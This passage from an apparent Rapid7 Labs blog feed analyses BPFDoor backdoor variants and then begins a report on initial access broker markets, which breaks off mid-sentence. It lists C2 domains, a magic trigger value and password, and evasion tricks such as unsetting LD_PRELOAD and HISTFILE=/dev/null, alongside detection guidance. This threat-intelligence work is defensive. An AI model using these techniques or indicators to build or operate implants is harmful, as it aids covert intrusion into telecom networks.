data-sys-asset-uid="blta42dd668f978b8fa" data-sys-asset-filename="hpasmlited-process-name-spoofing.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12: hpasmlited process name spoofing" data-sys-asset-alt="hpasmlited-process-name-spoofing.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 12: hpasmlited process name spoofing</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Then</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'>start_routine, sub_4089BB, sub_4084F7</span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>proceeds with the old codebase installing the same BPF filter shared among TM variant D samples; this variant supports ICMP relay.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Below is shown the creation of three different kinds of sockets filtering traffic by TCP, UDP, and ICMP:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt62eecb0870fc9b69/69ce65cf11fa1e2676b55cff/Creating-sockets-handling-TCP-UDP-ICMP.png" alt="Creating-sockets-handling-TCP-UDP-ICMP.png" caption="Figure 13: Creation of 3 sockets handling TCP, UDP, and ICMP" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Creating-sockets-handling-TCP-UDP-ICMP.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt62eecb0870fc9b69/69ce65cf11fa1e2676b55cff/Creating-sockets-handling-TCP-UDP-ICMP.png" data-sys-asset-uid="blt62eecb0870fc9b69" data-sys-asset-filename="Creating-sockets-handling-TCP-UDP-ICMP.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 13: Creation of 3 sockets handling TCP, UDP, and ICMP" data-sys-asset-alt="Creating-sockets-handling-TCP-UDP-ICMP.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 13: Creation of 3 sockets handling TCP, UDP, and ICMP</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Note that </span><span style='font-size: undefined;'><strong>a0t</strong></span><span style='font-size: undefined;'> is an array containing three BPF filters, each of them containing the same</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>229</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>instructions found in TM variant D. </span></p><h3 style="text-align: justify;direction: ltr;"><span style='color:rgb(67, 67, 67);'>HPE ProLiant-tuned variant: Living off the land</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>One variant  (Figure 14: </span><span data-type='inlineCode'><strong>9ee77ed38e5bc69f841bdaba7c5e6c3bf30fd9ae94cd2e69f39834e9cec76e82</strong></span><span style='font-size: undefined;'>)</span><span style='font-size: undefined;'><em><strong> </strong></em></span><span style='font-size: undefined;'>was specifically tailored for HPE ProLiant servers, demonstrating a "living off the land" approach through binary masquerading.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4b9e8eb6d512bc3/69ce665d99d6c57c497e4b13/HPE-Insight-Management-Agents-spoofing.png" alt="HPE-Insight-Management-Agents-spoofing.png" caption="Figure 14: HPE Insight Management Agents spoofing" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="HPE-Insight-Management-Agents-spoofing.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4b9e8eb6d512bc3/69ce665d99d6c57c497e4b13/HPE-Insight-Management-Agents-spoofing.png" data-sys-asset-uid="bltc4b9e8eb6d512bc3" data-sys-asset-filename="HPE-Insight-Management-Agents-spoofing.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 14: HPE Insight Management Agents spoofing" data-sys-asset-alt="HPE-Insight-Management-Agents-spoofing.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 14: HPE Insight Management Agents spoofing</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The process name is set to cmathreshd, with realistic flags like -p 5 -s OK, directly impersonating the HPE Insight Management Agents. The malware checks for /var/run/cma.lock. If found, it kills the legitimate HP agent and takes its place. This displacement prevents resource conflicts that would otherwise alert system administrators. The call to </span><span style='font-size: undefined;'><span data-type='inlineCode'>unsetenv("LD_PRELOAD")</span></span><span style='font-size: undefined;'> is designed to disable user-mode security hooks (such as local EDRs or rootkit hunters) that monitor system calls.</span><br/><span style='font-size: undefined;'>This specific masquerading tactic demonstrates deep environmental awareness. The threat actors recognize they are operating on physical, bare-metal HPE hardware commonly deployed in 4G and 5G core and edge systems (such as Ericsson-style architectures). </span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>The active beacon: Guaranteed persistence</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 variant ‘H’ contrasts with the classic, stealthy BPFDoor sniffer (which generates no outbound traffic). The beacon is proactive and provides guaranteed access by bypassing stateful firewalls that only permit outbound connections. It achieves this via a continuous heartbeat mechanism that resolves dynamic DNS domains, such as ntpussl.instanthq.com and ntpupdate.ddnsgeek.com. By masquerading as Network Time Protocol (NTP) over SSL, the threat actors seamlessly encapsulate their encrypted C2 sessions within what appears to be routine time synchronization or IoT telemetry. This 'hide in plain sight' tactic allows the active beacon to blend into the baseline network noise and establish a direct, unauthenticated connection on port 443 using the old-fashioned statically linked OpenSSL library and RC4-MD5 </span><span style='font-size: undefined;'>ciphersuite.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Heartbeat mechanism:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'>The function actively attempts to resolve the hardcoded C2 domain ntpussl.instanthq.com using the </span><span style='font-size: undefined;'><span data-type='inlineCode'>gethostbyname()</span></span><span style='font-size: undefined;'> function. It runs in an infinite loop, attempting to connect if the domain resolves. If the connection fails, it sleeps for a random interval (1 to 2.5 minutes) before trying again — this acts as the Heartbeat.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Masquerading:</strong></span><span style='font-size: undefined;'> The domain ntpussl.instanthq.com mimics NTP (Network Time Protocol) over SSL, blending into standard time-sync or certificate update traffic.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Activation kill switch:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'>A "Kill Switch" or "Activation" check verifies the IP returned by the DNS query: </span><span style='font-size: undefined;'><span data-type='inlineCode'>if ( !strstr(v1, "127.0.0.1") )</span></span><span style='font-size: undefined;'>.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Direct connection:</strong></span><span style='font-size: undefined;'> The malware connects to the resolved IP on port 443 (0x1BB) without requiring authentication.</span></p></li></ul><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt41183d8d1dfe5d12/69ce66d278b2b12b1876db8f/Rapid7-variant-H-active-beaconing.png" alt="Rapid7-variant-H-active-beaconing.png" caption="Figure 15: Rapid7 variant H active beaconing (sample spoofing the HPEProliant cmathreshd)" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Rapid7-variant-H-active-beaconing.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt41183d8d1dfe5d12/69ce66d278b2b12b1876db8f/Rapid7-variant-H-active-beaconing.png" data-sys-asset-uid="blt41183d8d1dfe5d12" data-sys-asset-filename="Rapid7-variant-H-active-beaconing.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 15: Rapid7 variant H active beaconing (sample spoofing the HPEProliant cmathreshd)" data-sys-asset-alt="Rapid7-variant-H-active-beaconing.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 15: Rapid7 variant H active beaconing (sample spoofing the HPEProliant cmathreshd)</figcaption></div></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Stack strings were employed to bypass basic static signature detection:</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11efc08c9532e76e/69ce7b298eac30c5b4a8abba/Screenshot_2026-04-02_at_9.35.09_AM.png" alt="Screenshot_2026-04-02_at_9.35.09_AM.png" caption="Figure 16: ca56622773c1b6f648b1578978b57aa668df25a11e0c782be008384a6af6c2c4" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Screenshot_2026-04-02_at_9.35.09_AM.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11efc08c9532e76e/69ce7b298eac30c5b4a8abba/Screenshot_2026-04-02_at_9.35.09_AM.png" data-sys-asset-uid="blt11efc08c9532e76e" data-sys-asset-filename="Screenshot_2026-04-02_at_9.35.09_AM.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 16: ca56622773c1b6f648b1578978b57aa668df25a11e0c782be008384a6af6c2c4" data-sys-asset-alt="Screenshot_2026-04-02_at_9.35.09_AM.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 16: ca56622773c1b6f648b1578978b57aa668df25a11e0c782be008384a6af6c2c4</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>By encapsulating encrypted shell sessions within what appears to be routine time synchronization or IoT telemetry, the threat actors effectively bypass standard firewall rules. Below is the list of domains observed being used by Chinese TAs during espionage campaigns:</span></p><h4>"Encrypted" Masquerade</h4><ul><li><p><strong>Domain:</strong> ntpussl[.]instanthq.com</p></li><li><p><strong>Function & analysis: </strong>Encrypted Shell/Tunneling. "ntpussl" recalls an ssl connection with an NTP server. (<span data-type='inlineCode'><strong>195b98211d1ce968669a0740ca08d0ddcf03a2df03a47e2e70550f6c002b49e8</strong></span>; <span data-type='inlineCode'><strong>9ee77ed38e5bc69f841bdaba7c5e6c3bf30fd9ae94cd2e69f39834e9cec76e82</strong></span>).</p></li></ul><h4>"System Update" Disguise</h4><ul><li><strong>Domain: </strong>ntpupdate.ddnsgeek[.]com</li><li><strong>Function & analysis: </strong>Standard Utility Mimicry. This domain mimics the common ntpdate utility. The use of terms like "geek" or "update" is a social engineering tactic, as security analysts often overlook such domains, assuming they belong to benign OS background processes (<span data-type='inlineCode'><strong>ca56622773c1b6f648b1578978b57aa668df25a11e0c782be008384a6af6c2c4</strong></span>).</li></ul><h4>"Persistence" Disguise</h4><ul><li><strong>Domain: </strong>ntpupdate.ygto[.]com</li><li><strong>Function & analysis: </strong>Rapid IP Rotation. This domain is employed for dynamic DNS updates, enabling rapid IP rotation. If the primary C2 IP address is blocked, the attackers update the DDNS record at ygto.com to maintain command-and-control access.</li></ul><h4>"IoT/Camera" Disguise</h4><ul><li><strong>Domain: </strong>ntpd.casacam[.]net</li><li><strong>Function & analysis: </strong>Blending with residential traffic. Masquerades as a time check service for IP cameras. Since casacam.net is a legitimate DDNS provider for DVRs, traffic to this domain easily blends into the millions of devices monitored by telecom networks, especially in residential broadband environments.</li></ul><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Note: The domains ntpupdate.ygto[.]com and ntpd.casacam[.]net are involved in generic trojan/spam campaigns.</em></span></p><h3><span style='color:rgb(67, 67, 67);'>Rapid7 variants I,J,K and L</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 </span><span style='font-size: undefined;'><strong>variant “I”</strong></span><span style='font-size: undefined;'> uses an 11-instruction BPF filter targeting TCP port 9999, enforcing a two-step handshake, requiring firstly new magic bytes (</span><span style='font-size: undefined;'><span data-type='inlineCode'>0xA9F205C3</span></span><span style='font-size: undefined;'>) in the tcp payload, secondly the presence of a hardcoded magic password (</span><span style='font-size: undefined;'><span data-type='inlineCode'>dP7sRa3XwLm29E</span></span><span style='font-size: undefined;'>). Finally, it extracts the attacker’s IP and port to spawn an unencrypted reverse shell.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 assigned icmpShell and httpShell variants the letters </span><span style='font-size: undefined;'><strong>J,K</strong></span><span style='font-size: undefined;'> respectively while the letter </span><span style='font-size: undefined;'><strong>L</strong></span><span style='font-size: undefined;'> is reserved for samples exhibiting only the ICMP relay feature. To summarize:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Variant J</strong></span><span style='font-size: undefined;'>: ICMP relay + HTTP tunneling + icmpShell</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Variant K</strong></span><span style='font-size: undefined;'>: ICMP relay + HTTP tunneling</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Variant L</strong></span><span style='font-size: undefined;'>: ICMP relay</span></p></li></ul><h2 style="direction: ltr;">MITRE ATT&CK Matrix Mapping</h2><h3>Tactic: Execution</h3><h4>T1059.004: Unix Shell</h4><ul><li><strong>Implementation details:</strong> Hijacks a pseudo-terminal (PTY) utilizing <span data-type='inlineCode'>fork()</span> and <span data-type='inlineCode'>dup2()</span>.</li><li><strong>Variation:</strong> Both</li></ul><h3>Tactic: Defense Evasion</h3><h4>T1036.004: Masquerading</h4><ul><li><strong>Implementation details:</strong> Alters process arguments to mimic benign daemons like qmgr.</li><li><strong>Variation:</strong> Both</li></ul><h4>T1070.003: Clear History</h4><ul><li><strong>Implementation details:</strong> Injects <span data-type='inlineCode'>HISTFILE=/dev/null</span> into environment variables.</li><li><strong>Variation: </strong>Both</li></ul><h4>T1027: Obfuscated Files Information</h4><ul><li><strong>Implementation details:</strong> Stack strings for passwords and paths prevent static extraction.</li><li><strong>Variation: </strong>Both</li></ul><h4>T1564: Hide Artifacts</h4><ul><li><strong>Implementation details:</strong> Uses <span data-type='inlineCode'>AF_PACKET</span> sniffing to remain invisible to local netstat/ss.</li><li><strong>Variation:</strong> Both</li></ul><h3>Tactic: Persistence</h3><h4>T1205: Traffic Signaling</h4><ul><li><strong>Implementation details:</strong> Employs magic bytes and flags like <span data-type='inlineCode'>0xFFFFFFFF</span> as wake-up triggers.</li><li><strong>Variation: </strong>Both</li></ul><h3>Tactic: Command & Control</h3><h4>T1573.001: Symmetric Cryptography</h4><ul><li><strong>Implementation details:</strong> e.g. Enforces the X: plaintext tag and encrypts the underlying PTY output via an RC4 cipher (using the hardcoded ICMP key).</li><li><strong>Variation:</strong> Both</li></ul><h4>T1071.001: Application Layer Protocol</h4><ul><li><strong>Implementation details:</strong> Blends in by utilizing formatted HTTP POST requests with hardcoded URIs up to 100-byte hexadecimal bodies.</li><li><strong>Variation:</strong> httpShell</li></ul><h4>T1095: Non-App Protocol</h4><ul><li><strong>Implementation details:</strong> Transmits exfiltration via crafted ICMP Echo Requests.</li><li><strong>Variation:</strong> Both</li></ul><h4>T1090: Proxy</h4><ul><li><strong>Implementation details:</strong> Uses ICMP relay to bounce traffic through internal segments.</li><li><strong>Variation:</strong> Both</li></ul><h4>T1001: Data Obfuscation</h4><ul><li><strong>Implementation details:</strong> icmpShell hides its tracking mechanisms directly inside the network layer headers. By truncating the Linux Process ID (PID) and injecting it into the 16-bit ICMP Identifier field, and hardcoding the ICMP Sequence Number to 1234, it obfuscates its session tracking data as standard network metadata.</li><li><strong>Variation:</strong> icmpShell</li></ul><h4>T1572: Protocol Tunneling</h4><ul><li><strong>Implementation details:</strong> ICMP tunneling</li><li><strong>Variation:</strong> icmpShell</li></ul><h4>T1090: Proxy</h4><ul><li><strong>Implementation details:</strong> The BPF filter concurrently sniffs TCP, UDP, and ICMP. If one protocol is blocked by egress filtering, the attacker can seamlessly utilize an alternate protocol to trigger the shell without reconfiguring the implant.</li><li><strong>Variation:</strong> Both</li></ul><h2 style="direction: ltr;">Defensive depth and detection guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Detection must shift from looking for payload content to identifying structural anomalies and static protocol markers.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Suricata/NIDS focus</strong></span><span style='font-size: undefined;'>:</span><span style='font-size: undefined;'> Target the hardcoded 1234 sequence number used in custom functions and the technically invalid ICMP Code 1 injected by the heartbeat thread.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Host monitoring</strong></span><span style='font-size: undefined;'>:</span><span style='font-size: undefined;'> Monitor for processes whose executable path does not exist on disk and spoofed processes running as root (e.g., zabbix_agentd, dockerd).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Auditd rules</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>Monitor the creation of </span><span style='font-size: undefined;'><span data-type='inlineCode'>AF_PACKET</span></span><span style='font-size: undefined;'> sockets (capturing </span><span style='font-size: undefined;'><span data-type='inlineCode'>SOCK_RAW</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>SOCK_DGRAM</span></span><span style='font-size: undefined;'>) and the setsockopt call used to attach BPF filters.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Rapid7 triage script</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>Utilize the </span><span style='font-size: undefined;'><span data-type='inlineCode'>rapid7_bpfdoor_check.sh</span></span><span style='font-size: undefined;'> script to check for zero-byte mutex files and active BPF filters attached to packet sockets. Get the complete checklist at </span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/BPFDoor" target="_blank"><span style='font-size: undefined;'>Rapid7’s github.</span></a></p></li></ul><h2 style="direction: ltr;">Final takeaways</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Kernel-level evasion</strong></span><span style='font-size: undefined;'>:</span><span style='font-size: undefined;'> The shift to </span><span style='font-size: undefined;'><span data-type='inlineCode'>SOCK_DGRAM</span></span><span style='font-size: undefined;'> allows the malware to simplify magic packet parsing by letting the host kernel decapsulate tunnels.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Layer 7</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><strong>camouflage</strong></span><span style='font-size: undefined;'>:</span><span style='font-size: undefined;'> Weaponized SSL termination and "magic ruler" padding ensure trigger bytes survive WAF/Proxy interference.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Deep</strong></span><span style='font-size: undefined;'>-</span><span style='font-size: undefined;'><strong>network</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><strong>lateral</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><strong>movement</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>The "Hidden IP" field transforms infected machines into invisible network routers for bidirectional ICMP PTY tunnels.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>New Variants</strong></span><span style='font-size: undefined;'>: the newly identified features in BPFDoor samples highlight how TAs are tailoring and reusing BPFDoor’s code to the target environment. The rapid7 variant H (active beacon) stands out as it tries to blend in with the network traffic contacting fake NTP update servers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Operational security</strong></span><span style='color:rgb(2, 3, 3);font-size: undefined;'><strong>:</strong></span><span style='font-size: undefined;'> The malware can instruct the infected node to spawn a shell to the source of the magic packet using the signed -1, without embedding the C2 or proxy IP in the packet payload. Furthermore, unlike httpShell, the icmpShell is designed to run without requiring live interaction as it terminates itself after 12s of inactivity, demonstrating how surgical and precise the TA intervention is when accessing the core of the backbone, achieving maximum stealthiness.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>For an exhaustive deep dive of the assembly code, BPF bytecode, and exact packet structures used by icmpShell and httpShell variants, please refer to our </span><span style='font-size: undefined;'><strong>technical whitepaper </strong></span><a href="https://assets.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3dbeae8537bb21b/69ce33a499d6c52de57e4a02/unmasking-the-new-stealthy-BPFDoor-variants.pdf" target="_blank"><span style='font-size: undefined;'><strong>here</strong></span></a><span style='font-size: undefined;'>. You can also view our</span><span style='font-size: undefined;'><strong> on-demand webinar </strong></span><a href="https://www.brighttalk.com/webcast/10457/665136?utm_source=Rapid7&amp;utm_medium=brighttalk&amp;utm_campaign=665136?utm_source=brighttalk&amp;utm_medium=blog&amp;utm_content=follow-up&amp;utm_campaign=global-pla-q1-2026-project-matrix-webinar-prospect-eng" target="_blank"><span style='font-size: undefined;'><strong>here</strong></span></a><span style='font-size: undefined;'>.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-new-whitepaper-stealthy-bpfdoor-variants</link>
      <guid isPermaLink="false">bltc523388b61c90b80</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Threat Intel]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Thu, 02 Apr 2026 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt798a899f1a4b6f05/69ce68974027816403c2d330/Hero-Unmasking-New-Stealthy-BPFDoor-Variants.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Initial Access Brokers have Shifted to High-Value Targets and Premium Pricing]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Initial Access Brokers (IABs) are a key component of the cybercrime ecosystem, offering hassle-free building blocks for ransomware, data theft, and extortion. Rapid7’s analysis of H2 2025 activity across five major forums grants fresh insight into a power balance shift toward initial access sales from newer marketplaces, such as RAMP and DarkForums. Higher asking prices and more focus on high-value sectors and large organizations, such as Government, Retail, and IT, reveal a mature and profit-focused IAB market.</span><br/><br/><span style='font-size: undefined;'>This blog highlights key access trends and pricing, pinpoints the most targeted industries and regions, and gives actionable recommendations for identifying and isolating potential breaches via popular IAB offerings.</span></p><h2 style="direction: ltr;">Key findings</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Our detailed analysis of six months of data from Exploit, XSS, BreachForums, DarkForums, and RAMP reveals the following key findings:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Access prices and target organization size increased dramatically:</strong></span><span style='font-size: undefined;'> The average alleged victim revenue and offering base price have increased significantly compared to the previous year, indicating that IABs are targeting larger, higher-value enterprises and charging premium prices for quality access.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Primary access vectors haven’t changed:</strong></span><span style='font-size: undefined;'> RDP, VPN, and RDWeb remain the top access vectors being offered for sale, which means that remote access infrastructure is still the primary attack surface for initial access sales. </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>High-privilege access is increasingly prioritized:</strong></span><span style='font-size: undefined;'> Most common privilege levels being offered by IABs are Domain User (42.9%), Domain Admin (32.1%), and Local Admin (12.5%), with a visible decline in lower-privilege offerings, such as Local User privileges. It seems the market is shifting from volume to high-impact access that enables faster and more efficient malicious operations, such as ransomware and extortion attacks.  </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Certain underground marketplaces have become favored over others:</strong></span><span style='font-size: undefined;'> DarkForums (221 threads) and RAMP (208 threads) were the most active forums for initial access sales in H2 2025, accounting together for 81% of the observed threads. At the same time, older, historically dominant forums such as XSS and Exploit saw significant declines in IAB activity. </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>IABs target specific industries:</strong></span><span style='font-size: undefined;'> IAB activity is primarily concentrated on sectors offering the highest potential for financial gain or intelligence acquisition: Government, Retail, and Information Technology (IT).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Focus on government access:</strong></span><span style='font-size: undefined;'> The </span><a href="https://www.rapid7.com/solutions/industry/government/"><span style='font-size: undefined;'>Government sector</span></a><span style='font-size: undefined;'> is the most frequently targeted industry vertical, at 14.2% (Retail and Information Technology follow with 13.1% and 10.8%, respectively). 'Admin panel' access is the most commonly observed type offered for this sector, with DarkForums serving as the principal platform for its sale.</span></p></li></ul><h2 style="direction: ltr;">IAB and cybercrime forum landscape in 2026</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Just as in 2025, cybercriminal forums continue to serve as the primary marketplaces for the promotion and sale of pirated network access. Platforms such as Exploit, BreachForums, XSS, DarkForums, and RAMP have remained central pillars of the cybercriminal underground through 2025 and into 2026, despite sustained law-enforcement pressure, infrastructure seizures, and repeated cycles of disruption and rebirth. In response to the continued relevance, Rapid7 threat intelligence researchers expanded their monitoring to include all five forums, tracking activity from January through December 2025. The primary objective was to benchmark Initial Access Broker (IAB) activity and adjacent services, including an in-depth analysis of tactics, techniques, and procedures (TTPs), initial access vectors, credential and session pricing, victim geographies, and evolving monetization strategies.</span></p><h2 style="direction: ltr;">Why cybercrime forums matter in 2026</h2><p style="direction: ltr;"><span style='font-size: undefined;'>We selected these five forums for their continued relevance, the concentration of experienced actors, and their distinct functional roles within the cybercriminal ecosystem. Collectively, they represent the full lifecycle of modern cybercrime from initial compromise and access brokerage to data monetization, extortion, and ransomware enablement. Despite repeated takedowns and administrator arrests, the past two years have demonstrated that forum resilience, brand persistence, and rapid reconstitution remain defining characteristics of the underground economy. Monitoring activity across these platforms, particularly from reputable, high-volume IABs and repeat sellers, provides critical insight into shifting attacker priorities, preferred access vectors, and pricing dynamics.</span></p><h2 style="direction: ltr;">Exploit, XSS, DarkForums, BreachForums, and RAMP: Combined data analysis </h2><p style="direction: ltr;"><span style='font-size: undefined;'>Last year, in </span><a href="https://www.rapid7.com/lp/initial-access-brokers-report-va/" target="_blank"><span style='font-size: undefined;'>The Rapid7 2025 Access Brokers Report</span></a><span style='font-size: undefined;'>, we analyzed the data of three main cybercrime forums, Exploit, XSS, and BreachForums. This year, we have expanded this list to include two additional (and very popular) forums, DarkForums and RAMP.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In fact, the newly analyzed forums were the most active in the past six months in terms of initial access and privileges offered for sale: DarkForums with 221 sale threads, followed by RAMP with 208, then Exploit with 53, Breached with 30, and XSS with 18. This might indicate a certain change in shifts in terms of popularity between the newer forums and the older ones.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt04a3e1f7fc0d5c3e/69cbbd2c23883d5e170aaf37/image3.png" height="743" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image3.png" asset-alt="image3.png" width="1201" max-width="1201" max-height="743" style="max-width: 1201px; width: 1201px; max-height: 743px; height: 743px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt04a3e1f7fc0d5c3e/69cbbd2c23883d5e170aaf37/image3.png" data-sys-asset-uid="blt04a3e1f7fc0d5c3e" data-sys-asset-filename="image3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image3.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The average alleged revenue of the organizations whose access is being sold in these forums was $3.242 billion, and the average base price for the offerings was $113,275. However, it is important to keep in mind that victim revenue numbers are broker-provided based on their own online research, and as such, they may not necessarily be accurate.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Both numbers manifest a substantial rise compared to last year (average revenue - $2.232 billion, average base price - $2,726), with the average base price of the offerings increasing by approximately 4055% compared to last year. Notably, these numbers are especially affected by DarkForums, with tremendously high values in both counts. They show that IABs have become more resourceful, finding weak spots in larger organizations, and also much greedier in terms of the price of their offerings.</span></p><p><span style='color:rgb(67, 67, 67);'>Initial access vectors and privilege types</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Analysis of the access types offered for sale revealed 29 distinct types of access. The most frequently advertised access types were RDP (21.2%, 91 offers), VPN (12.8%, 55 offers), and RDWeb (11.2%, 48 offers).</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5084c3bd48a232a6/69cbbd2c08dd4c33ccc35c8d/image5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image5.png" asset-alt="image5.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5084c3bd48a232a6/69cbbd2c08dd4c33ccc35c8d/image5.png" data-sys-asset-uid="blt5084c3bd48a232a6" data-sys-asset-filename="image5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image5.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The most common privilege types were Domain User with 144 instances (42.9%), followed by Domain Admin with 108 (32.1%) and Local Admin with 42 (12.5%).</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcc04b61ff1c54d85/69cbbd2d868a299495e5ff9f/image14.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image14.png" asset-alt="image14.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcc04b61ff1c54d85/69cbbd2d868a299495e5ff9f/image14.png" data-sys-asset-uid="bltcc04b61ff1c54d85" data-sys-asset-filename="image14.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image14.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In many observed cases, VPN and RDWeb access are sold with the Domain User privilege, while RDP 